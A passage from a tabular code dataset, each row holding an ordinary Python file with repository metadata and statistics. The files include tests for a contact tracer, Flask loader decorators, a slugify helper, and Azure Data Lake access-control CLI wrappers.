| 18.42 | 50 | 0.611292 | 138 | 921 | 3.949275 | 0.202899 | 0.073395 | 0.121101 | 0.110092 | 0.869725 | 0.869725 | 0.869725 | 0.869725 | 0.836697 | 0.704587 | 0 | 0.037627 | 0.249729 | 921 | 49 | 51 | 18.795918 | 0.751085 | 0 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 1 | 0.30303 | false | 0 | 0.030303 | 0.181818 | 0.515152 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
40e56f6381e6d31e7a025ce651400a41dacfcbbb | 332 | py | Python | tests/unit_tests/backend/samples.py | necromuralist/packet_capture | 34cf57856234fc193860ea11af9f2ab81478daad | [
"MIT"
] | null | null | null | tests/unit_tests/backend/samples.py | necromuralist/packet_capture | 34cf57856234fc193860ea11af9f2ab81478daad | [
"MIT"
] | 1 | 2018-06-10T21:33:23.000Z | 2018-06-10T21:33:23.000Z | tests/unit_tests/backend/samples.py | necromuralist/alpaca | 34cf57856234fc193860ea11af9f2ab81478daad | [
"MIT"
] | null | null | null | OUTPUT = """File name: /home/erysichthon/usbstick/packets/channel_6.pcap0
First packet time: 2018-06-16 16:32:42.322949
Last packet time: 2018-06-17 17:05:17.160418"""
FILE_NAME = "/home/erysichthon/usbstick/packets/channel_6.pcap0"
FIRST_TIME = "2018-06-16 16:32:42.322949"
LAST_TIME = "2018-06-17 17:05:17.160418"
| 41.5 | 83 | 0.71988 | 57 | 332 | 4.105263 | 0.403509 | 0.136752 | 0.17094 | 0.196581 | 0.923077 | 0.923077 | 0.923077 | 0.923077 | 0.717949 | 0.478632 | 0 | 0.289655 | 0.126506 | 332 | 7 | 84 | 47.428571 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0.810241 | 0.301205 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
40e87c2299e7f46357f1df1c58c38e73dd3f65c7 | 118 | py | Python | oggm/utils/__init__.py | skachuck/oggm | b391e6923fb0c5269e10ea260f5199a26d5e1082 | [
"BSD-3-Clause"
] | 156 | 2015-10-11T16:38:43.000Z | 2022-03-24T04:19:16.000Z | oggm/utils/__init__.py | skachuck/oggm | b391e6923fb0c5269e10ea260f5199a26d5e1082 | [
"BSD-3-Clause"
] | 953 | 2015-10-11T16:26:14.000Z | 2022-03-27T23:19:19.000Z | oggm/utils/__init__.py | skachuck/oggm | b391e6923fb0c5269e10ea260f5199a26d5e1082 | [
"BSD-3-Clause"
] | 92 | 2015-10-19T08:53:23.000Z | 2022-03-28T08:00:17.000Z | # flake8: noqa
from oggm.utils._downloads import *
from oggm.utils._funcs import *
from oggm.utils._workflow import *
| 23.6 | 35 | 0.779661 | 17 | 118 | 5.235294 | 0.529412 | 0.269663 | 0.438202 | 0.426966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 0.127119 | 118 | 4 | 36 | 29.5 | 0.854369 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
40ed8f8b4fd156393606df33b281ff8d080342d8 | 127 | py | Python | plugins/dbnd-azure/tests/conftest.py | turbaszek/dbnd | 6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0 | [
"Apache-2.0"
] | null | null | null | plugins/dbnd-azure/tests/conftest.py | turbaszek/dbnd | 6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0 | [
"Apache-2.0"
] | null | null | null | plugins/dbnd-azure/tests/conftest.py | turbaszek/dbnd | 6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0 | [
"Apache-2.0"
] | null | null | null | # inline conftest
pytest_plugins = [
"dbnd.testing.pytest_dbnd_plugin",
"dbnd.testing.pytest_dbnd_markers_plugin",
]
| 15.875 | 46 | 0.740157 | 15 | 127 | 5.866667 | 0.533333 | 0.25 | 0.386364 | 0.477273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149606 | 127 | 7 | 47 | 18.142857 | 0.814815 | 0.11811 | 0 | 0 | 0 | 0 | 0.636364 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dc173309d9568c53a1d3633ef79b6256f7bf5b9a | 186 | py | Python | shop/slugify.py | mohsenamoon1160417237/ECommerce-app | 4cca492214b04b56f625aef2a2979956a8256710 | [
"MIT"
] | null | null | null | shop/slugify.py | mohsenamoon1160417237/ECommerce-app | 4cca492214b04b56f625aef2a2979956a8256710 | [
"MIT"
] | null | null | null | shop/slugify.py | mohsenamoon1160417237/ECommerce-app | 4cca492214b04b56f625aef2a2979956a8256710 | [
"MIT"
] | null | null | null | def slugify(str):
str = str.replace(" " , "-")
str = str.replace("," , "-")
str = str.replace("(" , "")
str = str.replace(")" , "")
str = str.replace("؟" , "")
return str
| 20.666667 | 30 | 0.467742 | 21 | 186 | 4.190476 | 0.285714 | 0.409091 | 0.738636 | 0.727273 | 0.738636 | 0.738636 | 0.738636 | 0.738636 | 0.738636 | 0.738636 | 0 | 0 | 0.241935 | 186 | 8 | 31 | 23.25 | 0.617021 | 0 | 0 | 0 | 0 | 0 | 0.037634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
90d6376e46b20330d0817e88f76967adb77d9bdf | 124 | py | Python | bflib/items/weapons/__init__.py | ChrisLR/BasicDungeonRL | b293d40bd9a0d3b7aec41b5e1d58441165997ff1 | [
"MIT"
] | 3 | 2017-10-28T11:28:38.000Z | 2018-09-12T09:47:00.000Z | bflib/items/weapons/__init__.py | ChrisLR/BasicDungeonRL | b293d40bd9a0d3b7aec41b5e1d58441165997ff1 | [
"MIT"
] | null | null | null | bflib/items/weapons/__init__.py | ChrisLR/BasicDungeonRL | b293d40bd9a0d3b7aec41b5e1d58441165997ff1 | [
"MIT"
] | null | null | null | from bflib.items.weapons.melee import *
from bflib.items.weapons.ranged import *
from bflib.items.weapons.throwing import *
| 31 | 42 | 0.806452 | 18 | 124 | 5.555556 | 0.444444 | 0.27 | 0.42 | 0.63 | 0.54 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 124 | 3 | 43 | 41.333333 | 0.892857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
29003d535953a5f52475602c6ef1f19415921fba | 3,879 | py | Python | python/test/environment/test_max_slot_contact_tracer.py | stacyvjong/PandemicSimulator | eca906f5dc8135d7c90a1582b96621235f745c17 | [
"Apache-2.0"
] | null | null | null | python/test/environment/test_max_slot_contact_tracer.py | stacyvjong/PandemicSimulator | eca906f5dc8135d7c90a1582b96621235f745c17 | [
"Apache-2.0"
] | null | null | null | python/test/environment/test_max_slot_contact_tracer.py | stacyvjong/PandemicSimulator | eca906f5dc8135d7c90a1582b96621235f745c17 | [
"Apache-2.0"
] | null | null | null | # Confidential, Copyright 2020, Sony Corporation of America, All rights reserved.
import pytest
import numpy as np
from orderedset import OrderedSet
from pandemic_simulator.environment import MaxSlotContactTracer, PersonID
@pytest.fixture
def contact_tracer():
return MaxSlotContactTracer(storage_slots=5, time_slot_scale=24)
def test_emtpy_contact_tracer(contact_tracer):
assert len(contact_tracer.get_contacts(PersonID('a', 10))) == 0
def test_contacts(contact_tracer):
p1 = PersonID('a', 30)
p2 = PersonID('b', 40)
p3 = PersonID('c', 50)
p4 = PersonID('d', 50)
contacts = OrderedSet([(p1, p2), (p2, p4)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p1)
assert len(traces) == 1
assert p2 in traces
np.testing.assert_array_almost_equal(traces[p2], [1./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p4 in traces
np.testing.assert_array_almost_equal(traces[p1], [1./24., 0., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p4], [1./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p4)
assert len(traces) == 1
assert p2 in traces
np.testing.assert_array_almost_equal(traces[p2], [1./24., 0., 0., 0., 0.])
contacts = OrderedSet([(p1, p2), (p3, p4)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p1)
assert len(traces) == 1
assert p2 in traces
np.testing.assert_array_almost_equal(traces[p2], [2./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p4 in traces
np.testing.assert_array_almost_equal(traces[p1], [2./24., 0., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p4], [1./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p4)
assert len(traces) == 2
assert p2 in traces and p3 in traces
np.testing.assert_array_almost_equal(traces[p2], [1./24., 0., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p3], [1./24., 0., 0., 0., 0.])
contact_tracer.new_time_slot()
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p4 in traces
np.testing.assert_array_almost_equal(traces[p1], [0., 2./24., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p4], [0., 1./24., 0., 0., 0.])
contacts = OrderedSet([(p1, p2)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p4 in traces
np.testing.assert_array_almost_equal(traces[p1], [1/24., 2./24., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p4], [0., 1./24., 0., 0., 0.])
def test_contact_removal(contact_tracer):
p1 = PersonID('a', 30)
p2 = PersonID('b', 40)
p3 = PersonID('c', 50)
contacts = OrderedSet([(p1, p2), (p2, p3)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p1)
assert len(traces) == 1
assert p2 in traces
np.testing.assert_array_almost_equal(traces[p2], [1./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p3 in traces
np.testing.assert_array_almost_equal(traces[p1], [1./24., 0., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p3], [1./24., 0., 0., 0., 0.])
for _ in range(5):
contact_tracer.new_time_slot()
contacts = OrderedSet([(p2, p3)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p1)
assert len(traces) == 0
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 1
assert p3 in traces
np.testing.assert_array_almost_equal(traces[p3], [1./24., 1./24., 1./24., 1./24., 1./24.])
| 34.026316 | 94 | 0.664862 | 593 | 3,879 | 4.166948 | 0.112985 | 0.035613 | 0.033994 | 0.137596 | 0.823553 | 0.798462 | 0.778227 | 0.760421 | 0.755565 | 0.755565 | 0 | 0.073899 | 0.180201 | 3,879 | 113 | 95 | 34.327434 | 0.703145 | 0.020366 | 0 | 0.674699 | 0 | 0 | 0.002106 | 0 | 0 | 0 | 0 | 0 | 0.493976 | 1 | 0.048193 | false | 0 | 0.048193 | 0.012048 | 0.108434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4647589dc7bd4e62fa2ed4f2a3f494d5b85d563e | 2,510 | py | Python | flask_unchained/bundles/api/decorators.py | achiang/flask-unchained | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | [
"MIT"
] | null | null | null | flask_unchained/bundles/api/decorators.py | achiang/flask-unchained | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | [
"MIT"
] | null | null | null | flask_unchained/bundles/api/decorators.py | achiang/flask-unchained | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | [
"MIT"
] | null | null | null | from functools import wraps
from http import HTTPStatus
from flask import abort, request
def list_loader(*decorator_args, model):
"""
Decorator to automatically query the database for all records of a model.
:param model: The model class to query
"""
def wrapped(fn):
@wraps(fn)
def decorated(*args, **kwargs):
return fn(model.query.all())
return decorated
if decorator_args and callable(decorator_args[0]):
return wrapped(decorator_args[0])
return wrapped
def patch_loader(*decorator_args, serializer):
"""
Decorator to automatically load and (partially) update a model from json
request data
:param serializer: The ModelSerializer to use to load data from the request
"""
def wrapped(fn):
@wraps(fn)
def decorated(*args, **kwargs):
result = serializer.load(request.get_json(),
instance=kwargs.pop('instance'),
partial=True)
if not result.errors and not result.data.id:
abort(HTTPStatus.NOT_FOUND)
return fn(*result)
return decorated
if decorator_args and callable(decorator_args[0]):
return wrapped(decorator_args[0])
return wrapped
def put_loader(*decorator_args, serializer):
"""
Decorator to automatically load and update a model from json request data
:param serializer: The ModelSerializer to use to load data from the request
"""
def wrapped(fn):
@wraps(fn)
def decorated(*args, **kwargs):
result = serializer.load(request.get_json(),
instance=kwargs.pop('instance'))
if not result.errors and not result.data.id:
abort(HTTPStatus.NOT_FOUND)
return fn(*result)
return decorated
if decorator_args and callable(decorator_args[0]):
return wrapped(decorator_args[0])
return wrapped
def post_loader(*decorator_args, serializer):
"""
Decorator to automatically instantiate a model from json request data
:param serializer: The ModelSerializer to use to load data from the request
"""
def wrapped(fn):
@wraps(fn)
def decorated(*args, **kwargs):
return fn(*serializer.load(request.get_json()))
return decorated
if decorator_args and callable(decorator_args[0]):
return wrapped(decorator_args[0])
return wrapped
| 30.240964 | 79 | 0.630677 | 297 | 2,510 | 5.245791 | 0.195286 | 0.133504 | 0.071887 | 0.102696 | 0.837612 | 0.819641 | 0.819641 | 0.785623 | 0.785623 | 0.708601 | 0 | 0.004464 | 0.286056 | 2,510 | 82 | 80 | 30.609756 | 0.864955 | 0.228685 | 0 | 0.75 | 0 | 0 | 0.008625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.0625 | 0.041667 | 0.645833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
46af57651fb206ada860fc06ab94fe0502705059 | 172 | py | Python | klar_eda/preprocess/__init__.py | Sibasish-Padhy/klar-EDA | 6186981fda87e367a0013d4568e7f2fd094e56ed | [
"MIT"
] | 17 | 2020-09-27T12:18:32.000Z | 2022-02-27T13:54:12.000Z | klar_eda/preprocess/__init__.py | Sibasish-Padhy/klar-EDA | 6186981fda87e367a0013d4568e7f2fd094e56ed | [
"MIT"
] | 32 | 2020-09-27T18:48:23.000Z | 2022-03-01T04:48:57.000Z | klar_eda/preprocess/__init__.py | Sibasish-Padhy/klar-EDA | 6186981fda87e367a0013d4568e7f2fd094e56ed | [
"MIT"
] | 27 | 2020-09-27T12:30:38.000Z | 2022-02-24T18:48:30.000Z | from . import constants
from . import csv_preprocess
from . import image_preprocess
from . import preprocess
import pkg_resources
pkg_resources.declare_namespace(__name__)
| 24.571429 | 41 | 0.848837 | 22 | 172 | 6.227273 | 0.5 | 0.291971 | 0.291971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110465 | 172 | 6 | 42 | 28.666667 | 0.895425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d3c3ac844101ce71034298832dd7fcedb91edb1d | 2,974 | py | Python | tests/test_tsv_to_membership.py | phac-nml/biocanon | 10c859ed7a15c8fcaab283aed94b082e26b920bb | [
"Apache-2.0"
] | 1 | 2021-01-18T03:39:40.000Z | 2021-01-18T03:39:40.000Z | tests/test_tsv_to_membership.py | phac-nml/biocanon | 10c859ed7a15c8fcaab283aed94b082e26b920bb | [
"Apache-2.0"
] | 2 | 2020-06-23T18:44:16.000Z | 2020-06-25T17:03:25.000Z | tests/test_tsv_to_membership.py | phac-nml/bioCanon | 3797a16d3782f1784105ce1f6a4661aa69d0a150 | [
"MIT"
] | null | null | null | from bioCanon import __main__
import os
def test_groups_path():
    """tsv_to_membership parses the example TSV into the expected membership map.

    The expected value maps each sample id ('A'..'V') to a fixed 12-slot list:
    its hierarchical group codes from coarsest to finest ('2', '2.1', ...),
    padded with integer 0 for unused hierarchy levels.
    """
    # Build the path to the fixture relative to the current working directory
    # (assumes the test runner is invoked from the repository root -- TODO confirm).
    group_info = os.path.join(os.getcwd(), "tests", "examples", "testing.tsv")
    case = __main__.tsv_to_membership(group_info)
    # Expected membership table, hand-transcribed from testing.tsv.
    compare = {'A': ['1', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
               'B': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.1', 0, 0, 0, 0, 0, 0, 0],
               'C': ['2', '2.1', '2.1.1', '2.1.1.2', '2.1.1.2.1', 0, 0, 0, 0, 0, 0, 0],
               'D': ['2', '2.2', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
               'E': ['2', '2.1', '2.1.2', '2.1.2.1', '2.1.1.1.2', 0, 0, 0, 0, 0, 0, 0],
               'F': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.2', 0, 0, 0, 0, 0, 0],
               'G': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1',
                     '2.1.1.1.2.1.2', 0, 0, 0, 0, 0],
               'H': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
                     '2.1.1.1.2.1.1.2', 0, 0, 0, 0],
               'I': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
                     '2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.2', 0, 0, 0],
               'J': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
                     '2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.2', 0, 0],
               'K': ['2', '2.1', '2.1.2', '2.1.2.2', '2.1.2.2.2', 0, 0, 0, 0, 0, 0, 0],
               'L': ['2', '2.1', '2.1.2', '2.1.2.2', '2.1.2.2.2', 0, 0, 0, 0, 0, 0, 0],
               'M': ['2', '2.1', '2.1.2', '2.1.2.2', '2.1.2.2.1', 0, 0, 0, 0, 0, 0, 0],
               'N': ['2', '2.1', '2.1.2', '2.1.2.2', '2.1.2.2.1', 0, 0, 0, 0, 0, 0, 0],
               'O': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
                     '2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.1',
                     '2.1.1.1.2.1.1.1.1.1.2', 0],
               'P': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
                     '2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.1',
                     '2.1.1.1.2.1.1.1.1.1.2', 0],
               'Q': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
                     '2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.1',
                     '2.1.1.1.2.1.1.1.1.1.1', 0],
               'R': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
                     '2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.1',
                     '2.1.1.1.2.1.1.1.1.1.1', 0],
               'S': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.2', 0, 0, 0, 0, 0, 0],
               'T': ['2', '2.1', '2.1.1', '2.1.1.2', '2.1.1.2.2', 0, 0, 0, 0, 0, 0, 0],
               'U': ['2', '2.1', '2.1.1', '2.1.1.2', '2.1.1.2.2', 0, 0, 0, 0, 0, 0, 0],
               'V': ['2', '2.2', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]}
    assert case == compare
| 69.162791 | 99 | 0.311029 | 790 | 2,974 | 1.153165 | 0.059494 | 0.485181 | 0.378705 | 0.434687 | 0.807903 | 0.807903 | 0.805708 | 0.794731 | 0.781559 | 0.748628 | 0 | 0.353846 | 0.300605 | 2,974 | 42 | 100 | 70.809524 | 0.084135 | 0 | 0 | 0.2 | 0 | 0.1 | 0.37996 | 0.028245 | 0 | 0 | 0 | 0 | 0.025 | 1 | 0.025 | false | 0 | 0.05 | 0 | 0.075 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
d3c7912c846264ecc0baa74dec30c302f3f49962 | 12,880 | py | Python | pyaz/storage/fs/access/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/storage/fs/access/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/storage/fs/access/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | 1 | 2022-02-03T09:12:01.000Z | 2022-02-03T09:12:01.000Z | '''
Manage file system access and permissions for Azure Data Lake Storage Gen2 account.
'''
from .... pyaz_utils import _call_az
def set(account_key=None, account_name=None, acl=None, auth_mode=None, connection_string=None, group=None, owner=None, permissions=None, sas_token=None):
    '''
    Set the access control properties (ACL, owner, owning group or POSIX
    permissions) of a path -- directory or file -- in an Azure Data Lake
    Storage Gen2 account.

    Optional Parameters:
    - account_key -- storage account key; pair with account_name (env: AZURE_STORAGE_KEY)
    - account_name -- storage account name; pair with a key or SAS token (env: AZURE_STORAGE_ACCOUNT)
    - acl -- comma-separated access control entries, each "[scope:][type]:[id]:[permissions]"; mutually exclusive with permissions
    - auth_mode -- "login" to authenticate with your login credentials, or legacy "key" (env: AZURE_STORAGE_AUTH_MODE)
    - connection_string -- storage account connection string (env: AZURE_STORAGE_CONNECTION_STRING)
    - group -- owning group of the file or directory
    - owner -- owner of the file or directory
    - permissions -- POSIX permissions, symbolic (rwxrw-rw-) or 4-digit octal (e.g. 0766); mutually exclusive with acl
    - sas_token -- Shared Access Signature; pair with account_name (env: AZURE_STORAGE_SAS_TOKEN)
    '''
    # locals() must hold exactly the declared parameters here, since _call_az
    # maps them onto CLI flags -- do not introduce local variables above this.
    return _call_az("az storage fs access set", locals())
def show(account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None):
    '''
    Show the access control properties of a path (directory or file) in an
    Azure Data Lake Storage Gen2 account.

    Optional Parameters:
    - account_key -- storage account key; pair with account_name (env: AZURE_STORAGE_KEY)
    - account_name -- storage account name; pair with a key or SAS token (env: AZURE_STORAGE_ACCOUNT)
    - auth_mode -- "login" to authenticate with your login credentials, or legacy "key" (env: AZURE_STORAGE_AUTH_MODE)
    - connection_string -- storage account connection string (env: AZURE_STORAGE_CONNECTION_STRING)
    - sas_token -- Shared Access Signature; pair with account_name (env: AZURE_STORAGE_SAS_TOKEN)
    '''
    # locals() must hold exactly the declared parameters here, since _call_az
    # maps them onto CLI flags -- do not introduce local variables above this.
    return _call_az("az storage fs access show", locals())
def set_recursive(acl, account_key=None, account_name=None, auth_mode=None, batch_size=None, connection_string=None, continuation=None, continue_on_failure=None, max_batches=None, sas_token=None, timeout=None):
    '''
    Set the Access Control on a path and all of its sub-paths in an Azure
    Data Lake Storage Gen2 account.

    Required Parameters:
    - acl -- comma-separated access control entries, each "[scope:][type]:[id]:[permissions]"

    Optional Parameters:
    - account_key -- storage account key; pair with account_name (env: AZURE_STORAGE_KEY)
    - account_name -- storage account name; pair with a key or SAS token (env: AZURE_STORAGE_ACCOUNT)
    - auth_mode -- "login" to authenticate with your login credentials, or legacy "key" (env: AZURE_STORAGE_AUTH_MODE)
    - batch_size -- split large data sets into batches of this many requests (1-2000, default 2000) so progress can be tracked
    - connection_string -- storage account connection string (env: AZURE_STORAGE_CONNECTION_STRING)
    - continuation -- continuation token to resume a previously stopped operation
    - continue_on_failure -- if True, ignore user errors (4XX) and continue on other sub-entities; a continuation token is then returned on user errors. Default False
    - max_batches -- maximum number of batches a single operation may run; if hit, resume with the continuation token. Empty means unbounded
    - sas_token -- Shared Access Signature; pair with account_name (env: AZURE_STORAGE_SAS_TOKEN)
    - timeout -- request timeout in seconds, applied to each call to the service
    '''
    # locals() must hold exactly the declared parameters here, since _call_az
    # maps them onto CLI flags -- do not introduce local variables above this.
    return _call_az("az storage fs access set-recursive", locals())
def update_recursive(acl, account_key=None, account_name=None, auth_mode=None, batch_size=None, connection_string=None, continuation=None, continue_on_failure=None, max_batches=None, sas_token=None, timeout=None):
    '''
    Modify the Access Control on a path and all of its sub-paths in an Azure
    Data Lake Storage Gen2 account.

    Required Parameters:
    - acl -- comma-separated access control entries, each "[scope:][type]:[id]:[permissions]"

    Optional Parameters:
    - account_key -- storage account key; pair with account_name (env: AZURE_STORAGE_KEY)
    - account_name -- storage account name; pair with a key or SAS token (env: AZURE_STORAGE_ACCOUNT)
    - auth_mode -- "login" to authenticate with your login credentials, or legacy "key" (env: AZURE_STORAGE_AUTH_MODE)
    - batch_size -- split large data sets into batches of this many requests (1-2000, default 2000) so progress can be tracked
    - connection_string -- storage account connection string (env: AZURE_STORAGE_CONNECTION_STRING)
    - continuation -- continuation token to resume a previously stopped operation
    - continue_on_failure -- if True, ignore user errors (4XX) and continue on other sub-entities; a continuation token is then returned on user errors. Default False
    - max_batches -- maximum number of batches a single operation may run; if hit, resume with the continuation token. Empty means unbounded
    - sas_token -- Shared Access Signature; pair with account_name (env: AZURE_STORAGE_SAS_TOKEN)
    - timeout -- request timeout in seconds, applied to each call to the service
    '''
    # locals() must hold exactly the declared parameters here, since _call_az
    # maps them onto CLI flags -- do not introduce local variables above this.
    return _call_az("az storage fs access update-recursive", locals())
def remove_recursive(acl, account_key=None, account_name=None, auth_mode=None, batch_size=None, connection_string=None, continuation=None, continue_on_failure=None, max_batches=None, sas_token=None, timeout=None):
    '''
    Remove the Access Control on a path and all of its sub-paths in an Azure
    Data Lake Storage Gen2 account.

    Required Parameters:
    - acl -- comma-separated access control entries, each "[scope:][type]:[id]:[permissions]"

    Optional Parameters:
    - account_key -- storage account key; pair with account_name (env: AZURE_STORAGE_KEY)
    - account_name -- storage account name; pair with a key or SAS token (env: AZURE_STORAGE_ACCOUNT)
    - auth_mode -- "login" to authenticate with your login credentials, or legacy "key" (env: AZURE_STORAGE_AUTH_MODE)
